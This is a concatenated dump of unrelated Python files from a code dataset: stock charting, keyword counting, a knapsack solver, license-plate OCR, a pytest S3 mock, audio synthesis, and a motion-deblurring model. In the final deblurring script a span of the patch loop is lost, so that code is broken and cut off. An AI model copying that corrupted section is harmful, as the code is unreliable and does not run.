pd.concat([stock_df,dd22])\nfor item in [result]:\n item['5일 이동평균선'] = item['Close'].rolling(window=5).mean()\n item['30 Day STD'] = item['Close'].rolling(window=5).std()\n item['Upper Band'] = round(item['5일 이동평균선'] + (item['30 Day STD'] * 2),2)\n item['Lower Band'] = round(item['5일 이동평균선'] - 
(item['30 Day STD'] * 2),2)\n\n#stock_df[['Close', '30 Day MA', 'Upper Band', 'Lower Band']].plot(figsize=(12,6), grid = True)\nresult[['Close','5일 이동평균선', 'Upper Band', 'Lower Band']].iloc[-30:].plot(figsize=(12,6), grid = True)\nplt.title(Name + ' 5일 볼린져 밴드')\nplt.ylabel('가격')\nplt.show();\n#%%\n\nresult = result[['Close','Upper Band','Lower Band']]\nresult.iloc[-30:]\n\n\n\n#print(result.head(20))\n#print(result.info())\n##상한\n#print(result['Upper Band'].iloc[-30:])\n#print(result['Lower Band'].iloc[-30:])\n","sub_path":"senticle-CNN/Senticle-LSTM.py","file_name":"Senticle-LSTM.py","file_ext":"py","file_size_in_byte":11908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"530781435","text":"import json\nimport os.path\nfrom pprint import pprint\nfrom string import digits\nimport re, math\nfrom collections import Counter\nimport operator\nimport matplotlib.pyplot as plt\nfrom pylab import *\n\npos = arange(30)+.5\nl = []\n#l1 = []\ncount = 0\ndic = {}\n\nWORD = re.compile(r'\\w+')\n\ndef get_cosine(vec1, vec2):\n\tintersection = set(vec1.keys()) & set(vec2.keys())\n\tnumerator = sum([vec1[x] * vec2[x] for x in intersection])\n\tsum1 = sum([vec1[x]**2 for x in vec1.keys()])\n\t#print sum1\n\tsum2 = sum([vec2[x]**2 for x in vec2.keys()])\n\t#print sum2\n\tdenominator = math.sqrt(sum1) * math.sqrt(sum2)\n\t#print denominator\n\t #print \"denominator : \" + str(denominator) + \" numerator: \" + str(numerator)\n\tif not denominator:\n\t\treturn 0.0\n\telse:\n\t\treturn float(numerator) / denominator\n\t\ndef text_to_vector(text):\n\twords = WORD.findall(text)\n\treturn Counter(words)\n\ndef freq(var):\n\tif not dic:\n\t\tdic[var]=1\n\telse:\n\t\tfor key,value in dic.items():\n\t\t\tcosine = get_cosine(text_to_vector(key), text_to_vector(var))\n\t\t\tif (cosine > 0.7):\n\t\t\t\tcount = dic[key]\n\t\t\t\tcount+=1\n\t\t\t\tdic[key] = count\n\t\t\telse:\n\t\t\t\tdic[var]=1\n\t\treturn dic\t\t\n\t\t\n\ndef graph(d):\n\n\tplt.barh(pos, d.values(), align='center')\n\tplt.yticks(pos, (d.keys()))\n\n\t#plt.barh(range(len(d)), d.values(), align='center')\n\t#plt.yticks(range(len(d)), (d.keys()))\n\n\tfor i,v in enumerate(d.values()):\n\t\ttext(v + .2, i + .25, str(v), fontweight = 'bold', fontsize = '8')\n\txlim(0, 40)\n\n\tplt.xlabel('frequency', fontsize=18)\n\tplt.ylabel('keywords', fontsize=18)\n\tplt.title('Keywords v/s frequency',fontsize =20)\n\n\tplt.show()\t\n\ndef top30(x):\n\tsorted_dictionary = sorted(dic.items(), key=operator.itemgetter(1) , reverse=True)\n\tfor items in sorted_dictionary[:30:]:\n\t\tl.append(items)\n\t\tnew_dic= dict(l)\n\treturn new_dic\t\t\n\n\npath = []\ndirectory = '/home/shobhit/Query'\nfor filename in os.listdir(directory):\n\tif filename.endswith(\"Article 4v2.json\"):\n\t\t#print filename\n\t\tx = os.path.join(directory, filename)\n\t\tpath.append(x)\n#print path\n\t\t\n#count = 0\nfor journals in path:\n\t#print journals\n\n\twith open(journals) as data_file:\n\t\tjson1 = json.load(data_file)\n\n\t\tfor key,value in json1.items():\n\t\t\t#print key\n\t\t\tif key == \"details\":\n\t\t\t\tfor key_1,value_1 in value.items():\n\t\t\t\t\t#print key_1\n\t\t\t\t\tif key_1 == \"keywords\":\n\t\t\t\t\t\tfor ele in value_1:\n\t\t\t\t\t\t\tfor key_2,value_2 in ele.items():\n\t\t\t\t\t\t\t\tif key_2 == \"kwd\":\n\t\t\t\t\t\t\t\t\tfor ele in value_2:\n\t\t\t\t\t\t\t\t\t\tvar = ele.lower()\n\t\t\t\t\t\t\t\t\t\t#l.append(var)\n\t\t\t\t\t\t\t\t\t\tfreq(var)\n\n\t\t\t \n\t\t\telif key == \"referenced_articles\":\n\t\t\t\tfor ele in value:\n\t\t\t\t\tfor key,value in ele.items():\n\t\t\t\t\t\t#print key\n\t\t\t\t\t\tif key == \"details\":\n\t\t\t\t\t\t\tfor key_1,value_1 in value.items():\n\t\t\t\t\t\t\t\tif key_1 == 'keywords':\n\t\t\t\t\t\t\t\t\tfor ele in value_1:\n\t\t\t\t\t\t\t\t\t\tfor key_2,value_2 in ele.items():\n\t\t\t\t\t\t\t\t\t\t\tif key_2 == \"kwd\":\n\t\t\t\t\t\t\t\t\t\t\t\tfor ele in value_2:\n\t\t\t\t\t\t\t\t\t\t\t\t\tvar = 
ele.lower()\n\t\t\t\t\t\t\t\t\t\t\t\t\t#l1.append(var1)\n\t\t\t\t\t\t\t\t\t\t\t\t\tfreq(var)\n\t\t\t\t\t\ngraph(top30(dic))\n","sub_path":"keyfreq.py","file_name":"keyfreq.py","file_ext":"py","file_size_in_byte":2903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"323592213","text":"from collections import namedtuple\r\nfrom gurobipy import *\r\nfrom IPython.display import FileLink\r\nimport csv\r\n\r\nItem = namedtuple(\"Item\", ['index', 'value', 'weight'])\r\n\r\ndef submission_generation(filename, str_output):\r\n with open(filename, 'w', newline='') as file:\r\n writer = csv.writer(file)\r\n for item in str_output:\r\n writer.writerow(item)\r\n return FileLink(filename)\r\n\r\n\r\ndef check_solution(capacity, items, taken):\r\n weight = 0\r\n value = 0\r\n for item in items:\r\n if taken[item.index] == 1:\r\n weight += item.weight\r\n value += item.value+0.5\r\n if weight > capacity:\r\n print(\"solución incorrecta, se supera la capacidad de la mochila (capacity, weight):\", capacity, weight)\r\n return 0\r\n return int(value)\r\n\r\n\r\ndef gurobi(sortedItems, capacityI):\r\n taken = [0]*len(sortedItems)\r\n\r\n indices = [x[0] for x in sortedItems]\r\n valores = [x[1] for x in sortedItems]\r\n pesos = [x[2] for x in sortedItems]\r\n\r\n valoresDict = dict(zip(indices, valores))\r\n pesosDict = dict(zip(indices, pesos))\r\n\r\n m = Model(\"mochila\")\r\n\r\n x1 = m.addVars(indices, vtype=GRB.BINARY, name=\"x\")\r\n m.addConstr(x1.prod(pesosDict) <= capacityI)\r\n m.setObjective(x1.prod(valoresDict), GRB.MAXIMIZE)\r\n\r\n m.setParam(GRB.Param.PoolSolutions, 2048)\r\n m.setParam(GRB.Param.PoolGap, 0.01)\r\n m.setParam(GRB.Param.PoolSearchMode, 1)\r\n m.setParam(GRB.Param.TimeLimit, 10.0)\r\n\r\n m.optimize()\r\n\r\n for e in indices:\r\n if x1[e].x > 0.9:\r\n taken[e] = 1\r\n\r\n return taken\r\n\r\n\r\ndef process(sortedItems, capacityI):\r\n\r\n sortedItems.sort(key=lambda x: x.value/x.weight)\r\n taken = gurobi(sortedItems, capacityI)\r\n maximo = check_solution(capacityI, sortedItems, taken)\r\n\r\n if maximo == 0:\r\n exit(1)\r\n\r\n # prepare the solution in the specified output format\r\n output_data = '%.2f' % maximo + ' ' + str(0) + '\\n'\r\n output_data += ' '.join(map(str, taken))\r\n\r\n return output_data, maximo\r\n\r\n\r\nif __name__ == \"__main__\":\r\n for dirname, _, filenames in os.walk('data'):\r\n for filename in filenames:\r\n print(os.path.join(dirname, filename))\r\n str_output = [[\"Filename\", \"Max_value\"]]\r\n for dirname, _, filenames in os.walk('data'):\r\n for filename in filenames:\r\n full_name = dirname + '/' + filename\r\n with open(full_name, 'r') as input_data_file:\r\n input_data = input_data_file.read()\r\n lines = input_data.split('\\n')\r\n firstLine = lines[0].split()\r\n item_count = int(firstLine[0])\r\n capacity = int(firstLine[1])\r\n\r\n items = []\r\n j = 1\r\n for i in range(1, item_count + 1):\r\n line = lines[i]\r\n parts = line.split()\r\n if int(parts[1]) <= capacity and int(parts[0]) > 0:\r\n items.append(Item(j - 1, int(parts[0])-0.5, int(parts[1])))\r\n j = j + 1\r\n output, value = process(items, capacity)\r\n print(filename, \"-------------\", value, \"----------------\")\r\n str_output.append([filename, str(value)])\r\n\r\n submission_generation('Grupo1_Gurobi.csv', str_output)","sub_path":"knapsack.py","file_name":"knapsack.py","file_ext":"py","file_size_in_byte":3311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"437651993","text":"import cv2\nimport imutils\nfrom imutils import paths\n\nfrom solo.number_plate.pyimagesearch.anpr.anpr import PyImageSearchANPR\n\n\ndef cleanup_text(text):\n # strip out non-ASCII text so we can draw the text on the image\n # using OpenCV\n return \"\".join([c if ord(c) < 128 else \"\" for c in text]).strip()\n\n\n# initialize our ANPR class\nanpr = PyImageSearchANPR(True)\n\n# grab all image paths in the input directory\nimagePaths = sorted(list(paths.list_images(\"license_plates/group1\")))\n\n# loop over all image paths in the input directory\nfor imagePath in imagePaths:\n # load the input image from disk and resize it\n image = cv2.imread(\"../../img/in/Capture2.PNG\")\n image = imutils.resize(image, width=600)\n\n # apply automatic license plate recognition\n (lpText, lpCnt) = anpr.find_and_ocr(image, psm=7, clearBorder=True)\n\n # only continue if the license plate was successfully OCR'd\n if lpText is not None and lpCnt is not None:\n # fit a rotated bounding box to the license plate contour and\n # draw the bounding box on the license plate\n box = cv2.boxPoints(cv2.minAreaRect(lpCnt))\n box = box.astype(\"int\")\n cv2.drawContours(image, [box], -1, (0, 255, 0), 2)\n\n # compute a normal (unrotated) bounding box for the license\n # plate and then draw the OCR'd license plate text on the\n # image\n (x, y, w, h) = cv2.boundingRect(lpCnt)\n cv2.putText(image, cleanup_text(lpText), (x, y - 15),\n cv2.FONT_HERSHEY_SIMPLEX, 0.75, (0, 255, 0), 2)\n\n # show the output ANPR image\n print(\"[INFO] {}\".format(lpText))\n cv2.imshow(\"Output ANPR\", image)\n cv2.waitKey(0)\n","sub_path":"src/solo/number_plate/ocr_license_plate.py","file_name":"ocr_license_plate.py","file_ext":"py","file_size_in_byte":1688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"319664044","text":"# (D,C,H,S) + (A,2,3,4,5,6,7,8,9,0,J,Q,K) 用\"jk\"、\"JK\"分别表示小王、大王\n# 黑桃-spade 红桃-heart 方快-diamond 草花-club\nfrom os import rename\nfrom os import listdir\nfrom os.path import isfile, join\ndef rename_puke():\n\tpukes = []\n\tfor f in listdir():\n\t\tif isfile(f):\n\t\t\tif f == 'back.jpg':\n\t\t\t\tcontinue\n\t\t\tfix = f.split('.')\n\t\t\tif fix[1] == 'jpg':\n\t\t\t\tpukes.append(int(fix[0]))\n\n\tpukes.sort()\n\tcolors = ('S','H','C','D')\n\tnums = ('3','4','5','6','7','8','9','0','J','Q','K','A','2',)\n\t#print(str(pukes[0])+'.jpg', 'jk'+'.jpg')\n\t#print(str(pukes[1])+'.jpg', 'JK'+'.jpg')\n\trename(str(pukes[0])+'.jpg', 'jk1'+'.jpg')\n\trename(str(pukes[1])+'.jpg', 'jk2'+'.jpg')\n\tfor puke in pukes[2:]:\n\t\tindex = puke - 3\n\t\tcolor = index // 13\n\t\tnum = index % 13\n\t\tbefore = str(puke) + '.jpg'\n\t\tafter = colors[color] + nums[num] + '.jpg'\n\t\t#print(before, after)\n\t\trename(before, after)\n\nrename_puke()","sub_path":"grade/puke/modifiy.py","file_name":"modifiy.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"84521816","text":"import ezproxylookup\nimport boto3\nfrom moto import mock_s3\nimport pytest\n\n\n@pytest.fixture\ndef fake_config_json():\n config_json = \"\"\"\n\n [{\n \"title\": \"A Title\",\n \"config_file\": \"fake_config_file.txt\",\n \"urls\": [\"http://example.com\"]\n }]\n \"\"\"\n return config_json\n\n\n@pytest.fixture(autouse=True)\ndef aws_credentials(monkeypatch):\n monkeypatch.setenv('AWS_BUCKET_NAME', 'samples')\n\n\n@pytest.yield_fixture\ndef app():\n app = ezproxylookup.app\n ctx = app.test_request_context()\n ctx.push()\n yield app\n ctx.pop()\n\n\n@pytest.fixture\ndef client(app):\n app.config['TESTING'] = True\n app.config['SERVER_NAME'] = 'localhost'\n client = app.test_client()\n return client\n\n\n@pytest.fixture(autouse=True)\ndef s3_conn(fake_config_json):\n with mock_s3():\n conn = boto3.resource('s3', region_name='us-east-1')\n conn.create_bucket(Bucket='samples')\n # config.json must be an array of dicts, otherwise /econfig won't work\n # (for example, a single dict will cause it to fail)\n conn.Object('samples', 'config.json').put(Body=fake_config_json)\n yield conn\n","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"635865771","text":"\"\"\"Two words are anagrams of each other if the letters of one can be rearranged to fit the other. e.g. dormitory and dirty room.\n\nWrite a program that lets the user enter two strings, and tells them if they are anagrams of each other.\n\n Convert the strings into lists (list)\n Sort the letters of each word (sort)\n Check if the two are equal\n\nenter the first word: dormitory\nenter the second word: dirtyroom\n'dormitory' and 'dirtyroom' are anagrams\n\"\"\"\n\n# takes in a string from the use\nfirst_string = input(\"Enter the first word: \").lower()\nsecond_string = input(\"Enter the second word: \").lower()\n\n# function that splits each string into words, and then each word into a master list of letters, and then sorts the list alphabetically\ndef letter_splitter(user_input):\n str_to_words = user_input.split() \n all_letters = list()\n for word in str_to_words:\n letter = list(word)\n all_letters += letter\n all_letters.sort()\n return all_letters\n\nif letter_splitter(first_string) == letter_splitter(second_string):\n print(f'{first_string} and {second_string} are anagrams!')\nelse:\n print(f'{first_string} and {second_string} are not anagrams!')\n\n \n\n\n","sub_path":"lab10.py","file_name":"lab10.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"34180934","text":"\nfrom pyo import *\n\ns = Server().boot()\ns.start()\n\nfade = Fader(fadein=.1, mul=.07).play()\na = Noise(fade).mix(2).out()\n\nlf1 = Sine(freq=[.1, .15], mul=100, add=250)\nlf2 = Sine(freq=[.18, .15], mul=.4, add=1.5)\n\nb = Phaser(a, freq=lf1, spread=lf2, q=1, num=20, mul=.5).out(0)\n\ns.gui( locals() )\n","sub_path":"pyo_scripts/pyo_phaser.py","file_name":"pyo_phaser.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"645983822","text":"\n# coding: utf-8\n\n# Pixel Embedding Model\n# ================\n# **Author**: `Shu Kong `\n# \n# **Date**: Oct. 2018\n# \n# Training from scratch for many things in self-supervised/unsupervised learning manner.\n# \n# - Set the dataset class for loading data.\n# - Write the model architecture and loss functions.\n# - Train the model from scratch.\n# - Evaluate the model both quantitatively and qualitatively.\n\n# import packages\n# ------------------\n\n# In[1]:\n\n\nfrom __future__ import print_function, division\nimport os, random, time, copy\nfrom skimage import io, transform\nimport numpy as np\nimport os.path as path\nimport scipy.io as sio\nfrom scipy import misc\nfrom scipy import ndimage, signal\nimport scipy\nimport pickle\n\n\nimport math\nimport matplotlib.pyplot as plt\nfrom PIL import Image\nfrom io import BytesIO\nfrom skimage import data, img_as_float\nfrom skimage.measure import compare_ssim as ssim\nfrom skimage.measure import compare_psnr as psnr\n\nimport torch\nfrom torch.utils.data import Dataset, DataLoader\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.optim import lr_scheduler \nimport torch.nn.functional as F\nfrom torch.autograd import Variable\n\nimport torchvision\nfrom torchvision import datasets, models, transforms\n\nfrom utils.metrics import *\nfrom utils.flow_functions import *\nfrom models.pixel_embedding_model import *\nfrom datasetMotionBlur import *\nfrom trainvalGaussBlur import *\nimport pyblur\nimport warnings # ignore warnings\nwarnings.filterwarnings(\"ignore\")\n\n\n# setup config parameters\n# -----------------\n\n# In[2]:\n\n\n# set device, which gpu to use.\ndevice ='cpu'\nif torch.cuda.is_available(): device='cuda:3'\n\n################## set attributes for this project/experiment ##################\n# config result folder\nexp_dir = './exp'\nproject_name = 'main004_MotionBlur_v0_Ksz17Res18softmax'\n\n#pretrainedModelPath = '../tutorial_pytorch_03_instSegm/exp/main004_instFromSemantic_v4_ftV3_largeLR/epoch-200.paramOnly' \n\n\n# config data loader \npath_to_root = '/home/skong2/scratch/dataset/MotionBlurDataset'\n\n\nbatch_size = 8\ngradLossWeight = 1.\n\nembedding_dim = 16 # dimension of the learned embedding space\nkernel_size = 17\ncropSize = [64, 64]\n# Gaussian blur kernel\nsigmaMin=0.5\nsigmaMax=2\n\nlambda_norm = 0.1\ntotal_epoch_num = 500 # total number of epoch in training\nbase_lr = 0.0005 # base learning rate\n\ntorch.cuda.device_count()\ntorch.cuda.empty_cache()\n\nsave_dir = os.path.join(exp_dir, project_name)\nprint(save_dir) \nif not os.path.exists(save_dir): os.makedirs(save_dir)\nlog_filename = os.path.join(save_dir, 'train.log')\n\n\n# define model architecture\n# ---------\n\n# In[3]:\n\n\nclass SiamesePixelEmbed(nn.Module):\n def __init__(self, emb_dimension=64, filterSize=11, device='cpu', pretrained=False):\n super(SiamesePixelEmbed, self).__init__()\n self.device = device\n self.emb_dimension = emb_dimension \n self.PEMbase = PixelEmbedModelResNet18(emb_dimension=self.emb_dimension, pretrained=pretrained) \n self.rawEmbFeature1 = 0\n self.rawEmbFeature2 = 0 \n self.embFeature1_to_2 = 0\n self.embFeature1_to_2 = 0\n self.filterSize = filterSize\n self.filterSize2Channel = self.filterSize**2\n \n self.ordered_embedding = nn.Sequential( \n nn.Conv2d(self.emb_dimension, self.filterSize2Channel, kernel_size=3, padding=1, bias=False),\n nn.ReLU(True),\n nn.BatchNorm2d(self.filterSize2Channel), \n nn.Conv2d(self.filterSize2Channel, self.filterSize2Channel, kernel_size=3, 
padding=1, bias=False),\n nn.ReLU(True),\n nn.BatchNorm2d(self.filterSize2Channel), \n nn.Conv2d(self.filterSize2Channel, self.filterSize2Channel, kernel_size=3, padding=1, bias=True)\n )\n \n \n def forward(self, inputs1, inputs2): \n self.rawEmbFeature1 = self.PEMbase.forward(inputs1)\n #self.rawEmbFeature2 = self.PEMbase.forward(inputs2)\n \n #img1_to_img2 = torch.cat([self.rawEmbFeature1, self.rawEmbFeature2], 1)\n #img2_to_img1 = torch.cat([self.rawEmbFeature2, self.rawEmbFeature1], 1)\n \n self.embFeature1_to_2 = self.ordered_embedding(self.rawEmbFeature1) \n self.embFeature1_to_2 = F.softmax(self.embFeature1_to_2, 1)\n \n #self.embFeature2_to_1 = self.ordered_embedding(img2_to_img1)\n #self.embFeature2_to_1 = F.softmax(self.embFeature2_to_1, 1)\n \n return self.embFeature1_to_2 #self.embFeature2_to_1, self.embFeature1_to_2 \n\n\n# define loss function\n# ---------\n\n# In[4]:\n\n\nclass LossOrderedPairReconstruction(nn.Module):\n def __init__(self, device='cpu', filterSize=11):\n super(LossOrderedPairReconstruction, self).__init__()\n self.device = device\n self.filterSize = filterSize \n self.filterSize2Channel = self.filterSize**2\n self.reconstructImage = 0\n \n def forward(self, image1, image2, filters_img1_to_img2):\n N,C,H,W = image1.size()\n self.reconstructImage = self.rgbImageFilterFlow(image1, filters_img1_to_img2)\n diff = self.reconstructImage - image2 \n diff = torch.abs(diff) \n totloss = torch.sum(torch.sum(torch.sum(torch.sum(diff)))) \n return totloss/(N*C*H*W)\n \n \n def rgbImageFilterFlow(self, img, filters): \n inputChannelSize = 1\n outputChannelSize = 1\n N = img.size(0)\n paddingFunc = nn.ZeroPad2d(int(self.filterSize/2))\n img = paddingFunc(img) \n imgSize = [img.size(2),img.size(3)]\n \n out_R = F.unfold(img[:,0,:,:].unsqueeze(1), (self.filterSize, self.filterSize))\n out_R = out_R.view(N, out_R.size(1), imgSize[0]-self.filterSize+1, imgSize[1]-self.filterSize+1) \n #out_R = paddingFunc(out_R)\n out_R = torch.mul(out_R, filters)\n out_R = torch.sum(out_R, dim=1).unsqueeze(1)\n\n out_G = F.unfold(img[:,1,:,:].unsqueeze(1), (self.filterSize, self.filterSize))\n out_G = out_G.view(N, out_G.size(1), imgSize[0]-self.filterSize+1, imgSize[1]-self.filterSize+1) \n #out_G = paddingFunc(out_G)\n out_G = torch.mul(out_G, filters)\n out_G = torch.sum(out_G, dim=1).unsqueeze(1)\n\n out_B = F.unfold(img[:,2,:,:].unsqueeze(1), (self.filterSize, self.filterSize))\n out_B = out_B.view(N, out_B.size(1), imgSize[0]-self.filterSize+1, imgSize[1]-self.filterSize+1) \n #out_B = paddingFunc(out_B)\n out_B = torch.mul(out_B, filters)\n out_B = torch.sum(out_B, dim=1).unsqueeze(1)\n return torch.cat([out_R, out_G, out_B], 1)\n\n\n# evaluation/testing demo\n# -----------\n# ##### load a pretrained model\n\n# In[5]:\n\n\n#eval_model(curmodel, dataloaders, dataset_sizes, criterion, device=device)\nloss_ImageReconst = LossOrderedPairReconstruction(device=device, filterSize=kernel_size)\n\n\n################## load model ###################\npath_to_save_paramOnly = os.path.join(save_dir,'epoch-445.paramOnly')\n\n\nprint(path_to_save_paramOnly)\ncurmodel = SiamesePixelEmbed(emb_dimension=embedding_dim, \n filterSize=kernel_size,\n device=device, pretrained=False)\ncurmodel.load_state_dict(torch.load(path_to_save_paramOnly))\ncurmodel.to(device); \n#print(curmodel.state_dict)\ncurmodel.eval()\n#curmodel.train()\n#curmodel.training = False\nprint(curmodel.training)\n\n\n# In[6]:\n\n\n################## evaluate over validation set ###################\ntransform4Image = 
transforms.Compose(\n [transforms.ToTensor(),\n transforms.Normalize((127.,127.,127.),(127.,127.,127.)) # (mean, std)\n ]) # (mean, std)\n\n\n# moderateBlurDataset severeBlurDataset severeBlurDataset_fullRes moderateBlurDataset_fullRes\nsubset = 'train' \nvalset = Dataset4MotionBlur(root_dir=path_to_root, size=[64,64], # 64x64\n set_name=subset, transform=transform4Image,\n sigmaMin=sigmaMin, sigmaMax=sigmaMax,\n downsampleFactor=1)\n\n#valset = Dataset4MotionBlur__Evaluation(root_dir=path_to_root, size=[-64,-64], # 64x64\n# set_name=subset, transform=transform4Image,\n# sigmaMin=sigmaMin, sigmaMax=sigmaMax,\n# downsampleFactor=1)\n\nvaldataloader = DataLoader(valset, batch_size=1,shuffle=False, num_workers=1) # num_work can be set to batch_size\nprint(len(valset))\n\nobjDemoShowFlow = DemoShowFlow()\n#torch.no_grad()\n\n\n# Full resolution testing\n# ================\n\n# In[7]:\n\n\n# moderateBlurDataset severeBlurDataset severeBlurDataset_fullRes moderateBlurDataset_fullRes\nsubset = 'train' \nvalset = Dataset4MotionBlur(root_dir=path_to_root, size=[-64,-64], # 64x64\n set_name=subset, transform=transform4Image,\n sigmaMin=sigmaMin, sigmaMax=sigmaMax,\n downsampleFactor=1)\n\nvaldataloader = DataLoader(valset, batch_size=1,shuffle=False, num_workers=1) # num_work can be set to batch_size\n\n_, tmp = os.path.split(path_to_save_paramOnly)\ntmp, _ = tmp.split('.')\nresult_dir = './supplDataset'\n#save_dir = os.path.join(result_dir, project_name+'_'+tmp, subset)\nsave_dir = os.path.join(result_dir, 'loop0', 'train', subset)\n\nif not os.path.exists(save_dir): os.makedirs(save_dir)\n#if not os.path.exists(save_dir_deblur): os.makedirs(save_dir_deblur)\nprint(save_dir) \n\nXXX = []\n\npatchSize = 64\npatchStride = 20\npatchBnd2rm = 20\nglobalBnd2rm = 20\nlist_PSNR, list_SSIM, list_PSNR_LR, list_SSIM_LR = [], [], [], []\nlist_PSNR_fullRes, list_SSIM_fullRes, list_PSNR_LR_fullRes, list_SSIM_LR_fullRes = [],[],[],[]\nsampleId = 0\nid_of_interest = -3 # 4 13 17\nstartPoint = 5736\n\nfor sample in iter(valdataloader): \n sampleId += 1 \n if sampleId!=id_of_interest and id_of_interest>=0: continue\n if sampleId<startPoint: continue\n\n # NOTE: the original setup block here (unpacking `sample` into the on-device tensors\n # blurImage/clearImage and zero-initializing the accumulators reconstructedHR, countMap\n # and filterFlowMap) is missing from this copy; the height loop below is restored to\n # mirror the surviving width loop.\n countPatch = 0\n stopFlagH = 0\n start_h = 0\n while stopFlagH==0:\n if start_h+patchSize>=blurImage.size(2): \n start_h=blurImage.size(2)-patchSize\n stopFlagH = 1\n\n stopFlagW = 0\n start_w = 0\n while stopFlagW==0: # start_w+patchSize <= imgList1.size(3): \n if start_w+patchSize>=blurImage.size(3): \n start_w=blurImage.size(3)-patchSize\n stopFlagW = 1\n\n #print(start_h, start_h+patchSize,start_w,start_w+patchSize)\n countPatch += 1\n filterFlow = curmodel(blurImage[:,:,start_h:start_h+patchSize,start_w:start_w+patchSize], 0)\n _ = loss_ImageReconst(blurImage[:,:,start_h:start_h+patchSize,start_w:start_w+patchSize], 0, filterFlow)\n reconstructedImage2 = loss_ImageReconst.reconstructImage\n\n countMap[start_h+patchBnd2rm:start_h+patchSize-patchBnd2rm,\n start_w+patchBnd2rm:start_w+patchSize-patchBnd2rm, :]+=1\n \n \n if patchBnd2rm>0:\n reconstructedImage2 = reconstructedImage2[:,:,patchBnd2rm:-patchBnd2rm,\n patchBnd2rm:-patchBnd2rm]\n filterFlow = filterFlow[:,:,patchBnd2rm:-patchBnd2rm,\n patchBnd2rm:-patchBnd2rm]\n \n \n reconstructedImage2 = reconstructedImage2.detach().cpu().numpy().squeeze().transpose((1,2,0)) \n reconstructedHR[start_h+patchBnd2rm:start_h+patchSize-patchBnd2rm,\n start_w+patchBnd2rm:start_w+patchSize-patchBnd2rm, :] += reconstructedImage2\n \n filterFlow = filterFlow.detach().cpu().numpy()\n filterFlowMap[:,:,start_h+patchBnd2rm:start_h+patchSize-patchBnd2rm,\n start_w+patchBnd2rm:start_w+patchSize-patchBnd2rm] += filterFlow\n\n start_w += patchStride 
\n if start_w==blurImage.size(3): break \n start_h += patchStride\n\n \n blurImage = blurImage.cpu().numpy().squeeze().transpose((1,2,0)) \n clearImage = clearImage.cpu().numpy().squeeze().transpose((1,2,0))\n \n if globalBnd2rm>0:\n blurImage = blurImage[globalBnd2rm:-globalBnd2rm,globalBnd2rm:-globalBnd2rm,:]\n clearImage = clearImage[globalBnd2rm:-globalBnd2rm,globalBnd2rm:-globalBnd2rm,:]\n reconstructedHR = reconstructedHR[globalBnd2rm:-globalBnd2rm,globalBnd2rm:-globalBnd2rm,:]\n countMap = countMap[globalBnd2rm:-globalBnd2rm,globalBnd2rm:-globalBnd2rm,:]\n filterFlowMap = filterFlowMap[0,:,globalBnd2rm:-globalBnd2rm,globalBnd2rm:-globalBnd2rm]\n \n #imgNoisyFullRes = imgNoisyFullRes[0,:,globalBnd2rm:-globalBnd2rm,globalBnd2rm:-globalBnd2rm]\n #imgFullRes = imgFullRes[0,:,globalBnd2rm:-globalBnd2rm,globalBnd2rm:-globalBnd2rm]\n #reconstructedHR_fullRes = reconstructedHR_fullRes[globalBnd2rm:-globalBnd2rm,globalBnd2rm:-globalBnd2rm,:]\n \n reconstructedHR = np.divide(reconstructedHR,countMap) \n countMap = np.expand_dims(countMap.squeeze(),0)\n filterFlowMap = np.divide(filterFlowMap,countMap)\n \n\n #imgNoisyFullRes, imgFullRes = imgNoisyFullRes.detach().cpu().numpy(), imgFullRes.detach().cpu().numpy() \n #imgNoisyFullRes = imgNoisyFullRes.squeeze()\n #imgFullRes = imgFullRes.squeeze()\n #if globalBnd2rm>0:\n # imgNoisyFullRes = imgNoisyFullRes[globalBnd2rm:-globalBnd2rm,globalBnd2rm:-globalBnd2rm,:]\n # imgFullRes = imgFullRes[globalBnd2rm:-globalBnd2rm,globalBnd2rm:-globalBnd2rm,:]\n \n\n reconstructedHR_fullRes = reconstructedHR\n #reconstructedHR_fullRes = misc.imresize(reconstructedHR_fullRes, (imgFullRes.shape[0],imgFullRes.shape[1]), 'bicubic')\n\n \n flowVisShow=torch.from_numpy(filterFlowMap)\n UV = objDemoShowFlow.filterFlow2UV(flowVisShow).detach().numpy()\n UV = UV/np.ceil(kernel_size/2) \n flowVisShow = objDemoShowFlow.computeColor(UV[0], UV[1]) \n #misc.imsave(os.path.join(save_dir, '{:02d}_filterflow.png'.format(sampleId)), flowVisShow, format='png')\n misc.imsave(os.path.join(save_dir, '{:02d}_blurry.png'.format(sampleId)), reconstructedHR_fullRes, format='png')\n #misc.imsave(os.path.join(save_dir, '{:02d}_blurred.png'.format(sampleId)), imgNoisyFullRes, format='png')\n misc.imsave(os.path.join(save_dir, '{:02d}_GT.png'.format(sampleId)), (clearImage.clip(-1,1)+1)/2*255., format='png')\n \n XXX+=[filterFlowMap]\n \n #imgFullResY = rgb2ycbcr(imgFullRes.astype(np.int))\n #imgFullResY = imgFullResY[:,:,0]\n #imgNoisyFullResY = rgb2ycbcr(imgNoisyFullRes.astype(np.int))\n #imgNoisyFullResY = imgNoisyFullResY[:,:,0]\n #reconstructedHR_fullResY = rgb2ycbcr(reconstructedHR_fullRes.astype(np.int)) \n #reconstructedHR_fullResY = reconstructedHR_fullResY[:,:,0]\n\n #tmp = psnr(reconstructedHR_fullResY, imgFullResY, 255) \n #list_PSNR_fullRes += [tmp] \n #tmp = ssim(reconstructedHR_fullResY, imgFullResY, data_range=imgFullResY.max()-imgFullResY.min()) \n #list_SSIM_fullRes += [tmp]\n #tmp = psnr(imgNoisyFullResY, imgFullResY, 255) \n #list_PSNR_LR_fullRes += [tmp]\n #tmp = ssim(imgNoisyFullResY, imgFullResY, 